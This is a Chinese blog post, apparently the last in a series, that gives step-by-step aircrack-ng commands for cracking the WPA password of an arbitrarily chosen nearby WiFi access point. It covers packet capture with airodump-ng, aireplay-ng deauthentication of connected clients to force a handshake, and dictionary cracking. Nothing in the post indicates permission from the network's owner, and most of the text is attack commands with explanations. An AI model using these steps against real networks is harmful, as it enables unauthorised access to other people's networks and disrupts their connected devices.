学习aircrack-ng的过程(完)

学习aircrack-ng的过程(完)_第1张图片
这天气怎么这么冷,都懒得把手伸出去敲键盘。

在《学习aircrack-ng的过程(二)》的最后,我执行了airodump-ng wlan0命令后,搜索出周边有很多WIFI信息,随便找个AP,记录下AP的BSSID、CH。

学习aircrack-ng的过程(完)_第2张图片
图1.这里我选择BSSID为A8:15:4D:91:31:E4 CH:11 ESSID:MERCURY_9131E 这个AP

开启一个新的窗口在窗口中输入命令。

图2.airodump-ng --bssid A8:15:4D:91:31:E4 -c 11 -w /root/wire/MERCURY_9131E wlan0

来说一下这几个参数:

--bssid 是你选择这个AP的MAC地址。

-c 就是要记住的频道号

-w 是抓包后文件存储的位置和文件的名称。抓包后的文件名是MERCURY_9131E-01.cap这个文件名后续破解中要用到。

图3

wlan0 就是本机监听的无线网卡名称。有的名字会改变。输入的时候用iwconfig查看一下。

执行完(图2)中的命令后,得到下图的结果。这个窗口不要关,之后的破解还要用到,并记录STATION的MAC。STATION就是连在这个WIFI下的客户端。

学习aircrack-ng的过程(完)_第3张图片
图4.确保下边有数据。

保持上一个命令窗口不要关闭,新开一个终端窗口执行以下命令得到握手包:

图5.aireplay-ng -0 2 -a BSSID -c STATION wlan0

-0(DeAuth模式): 向客户端发送数据包,让客户端误以为是AP 发送的数据。

2 是表示这个命令向客户端发送几次数据。可以多设一些。

观察图5中未关闭的窗口中是否出现了WPA handshake字样。如果没有出现那就再等几分钟再次执行本步骤中的命令,直到出现。如果执行了超过30次或者时间超过30分钟依然没有出现,建议换一个AP试试。

学习aircrack-ng的过程(完)_第4张图片
图6.出现了上图中红框中的内容,就表示我们已经获取到了握手信息(包含有该网络密码的数据)。那么我们就可以结束监听网络了。

关闭监听

airmon-ng stop wlan0

启动网络

servie network-manager start

最后就可以获取密码了,执行如下命令:

图7

-w 后面跟的是破解的字典,这个可自行在网上去下载。

学习aircrack-ng的过程(完)_第5张图片
图8.开始执行破解。

注:除了aircrack-ng,还有很多种破解WIFI的方法。也许你会说:“太菜了!”。但我只想探究这个东西的实现方法。

吃水不忘挖井人:《利用aircrack-ng工具获取附近wifi的密码》

                                《使用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加密的 Wi-Fi 密码》

你可能感兴趣的:(学习aircrack-ng的过程(完))